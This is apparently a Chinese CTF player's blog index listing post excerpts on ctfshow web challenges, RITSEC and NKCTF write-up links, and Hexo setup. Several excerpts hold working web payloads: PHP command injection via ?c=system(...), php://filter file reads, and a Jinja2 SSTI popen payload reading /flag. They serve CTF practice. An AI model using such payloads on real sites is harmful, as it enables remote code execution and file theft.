Van

[网鼎杯 2020 半决赛]AliceWebsite
发表于
文件包含 includedata协议不行input也不行无语,直接遍历包含。
ctfshowweb1000
发表于
https://www.wlhhlc.top/posts/14827/ 命令执行: 41 55 56 脚本没学why,做完了命令执行。差收集姿势与理解脚本,原理(后面几道大题) https://blog.csdn.net/qq_49480008/article/details/113177878 https://ch1e.gitee.io/2021/07/23/ctfshowweb/ ?c=system(‘cat f?ag.php’); ?c=echo cat f???.???; ?c=echo%0atac%09f???*; 第二个%0a不行 32 ?c=include”$_GET[v]”?>&v=php://filter/read=convert.base64-encode/resource=flag.php 还可以用日志?? 33 ?c=include$_GET[v]?>&v=php://filter& ...
ctfshow愚人杯
发表于
ctfshow{一个不能说的秘密} ssti 过滤了/ /hello/%7B%7Blipsum.globals[‘os’].popen(‘echo "Y2F0IC9mbGFn"|base64 -d‘).read()%7D%7D https://blog.csdn.net/destiny10242048/article/details/129916697 官方https://ctf-show.feishu.cn/docx/KTfvd3GCOodJrRxVnk5ck1LunYb 之前的 https://www.cnblogs.com/Suica/p/16092730.html#/c/subject/p/16092730.html
ritsecctf2023
发表于
webNever gonna turn around giveyouup letyoudown desert you 没想到/和|不用删掉的,然后顺序的话,根据歌词的顺序来拼接 RS{//eveRG0nna_TuRna30unDG1v3y0uuP|3tY0||d0vvn__D3s3RTy0u} RS{/\/eveRG0nna_G1v3y0uuP_|3tY0|_|d0vvn__TuRna30unD__D3s3RTy0u} wp https://ctftime.org/event/1860/tasks/ https://www.leoreading.com/blog/ritsec-ctf-2023/web/pickle-store#/ Broken Bothttps://www.leoreading.com/blog/ritsec-ctf-2023/web/broken-bot#/ https://siunam321.github.io/ctf/RITSEC-CTF-2023/Web/Broken-Bot/ https://gitlab.ritsec ...
ctfshowmisc入门
发表于
wp常见文件头尾 https://blog.csdn.net/xiangshangbashaonian/article/details/80156865 https://blog.csdn.net/LYJ20010728/article/details/119193793 https://harvey.plus/index.php/archives/62/#toc-misc10 https://www.cnblogs.com/sakura--tears/p/17148309.html https://blog.csdn.net/Aluxian_/article/details/125831308
入门
发表于
记录知识点,扫盲。 参考wp https://www.wlhhlc.top/posts/14827/ 信息收集:探针,PHP探针 php探针是用来探测空间、服务器运行状况和PHP信息用的,探针可以实时查看服务器硬盘资源、内存占用、网卡流量、系统负载、服务器时间等信息。是一个查看服务器信息的工具。比如查看服务器支持什么,不支持什么,空间速度等等状况! tz.php mdb文件泄露 mdb文件是早期asp+access构架的数据库文件 于是我们访问/db/db.mdb 爆破没看 命令执行有的过滤的是中文的符号,看清楚 eval($c)思路,嵌套——?c=eval($_GET[1]);&1=system(“ls”); 分号过滤——用?>代替 括号过滤——用include 函数(require等不带括号的函数)?c=include%0a$_POST[1]?> 结合伪协议,读取文件 短标签 会echo出来 不会echo出来 读取文件函数 无参数rce 待学print_r(scandir(‘.’)); 查看当前目录下的所 ...
iscc2022
发表于
时间2022‎年‎5‎月‎13‎日,‏‎19:36:29 源码分析: <?phpshow_source(__FILE__);$Step1=False;$Step2=False;$info=(array)json_decode(@$_GET['Information']);//将传入的json格式的字符串转化为数组if(is_array($info)){ var_dump($info); is_numeric(@$info["year"])?die("Sorry~"):NULL;//year键的值不能是数字 if(@$info["year"]){ ($info["year"]=2022)?$Step1=True:NULL;//year键的值得是2022 } if(is_array(@$info["items"])){ if(!is_array($info[" ...
社工
发表于
找到就好了,格式看题目给的
hexotodo
发表于
指定文件夹下面生成文件 # hexo new post <title># -p 参数可以指定文章的路径hexo new post -p hello/hello-world # 注意里面的title为post# 此时里面的title为hello-world# hexo new post title -p dir/filenamehexo new post hello-world -p hello/hello-world## 当然了手动将文章放到指定的文件夹中也可以 吸顶,状态栏 导航栏下拉列表 每篇博客的访问量 图标问题,图片显示问题,加载慢 全图背景:发现能实现一图化,全部页面都是这张图片,但是不能实现多图一图化 butterfly的config里面 default_top_img: transparent 或者pic urlbackground: url(/img/yourname.png) 然后图片设置完成了,其他的要改透明度: 在butterfly的source/css下面自己写个xxx.css然后写入/* 首页文章卡片 */#recent-posts > ...
nkctf 2023
发表于
官方wp https://mp.weixin.qq.com/s?__biz=Mzg4MTg1MDY4MQ==&mid=2247484528&idx=1&sn=b2a03a4dc4cb6698be66ade248dfe535&chksm=cf5ee426f8296d3027567dcfa8bc20289752af8339925031fe44ef2f951897f0f98e00da6e54&mpshare=1&scene=23&srcid=0328nFGv1Tvj8qAOHKbgbIKQ&sharer_sharetime=1680007285512&sharer_shareid=2643fa15f41e985b074e9d1a10adbca5#rd 其他 misc https://blog.csdn.net/m0_68012373/article/details/129839415 https://www.ctfiot.com/105824.html
avatar
Van
铁马冰河入梦来
文章
59
标签
17
分类
1
Follow Me
公告
Welcome to my Blog
最新文章
CISCN 2019华北Day2 Web1
“CISCN2019 华东南赛区 Web11”
LitCTF2023
CISCN2019 华东南赛区 Web4
无题
分类
标签
SQL buu flask flask session 伪造 js nodejs phar php pickle反序列化 rce smarty sql ssrf ssti 个人博客 二次注入
归档
网站资讯
文章数目 :
59
本站访客数 :
本站总访问量 :
最后更新时间 :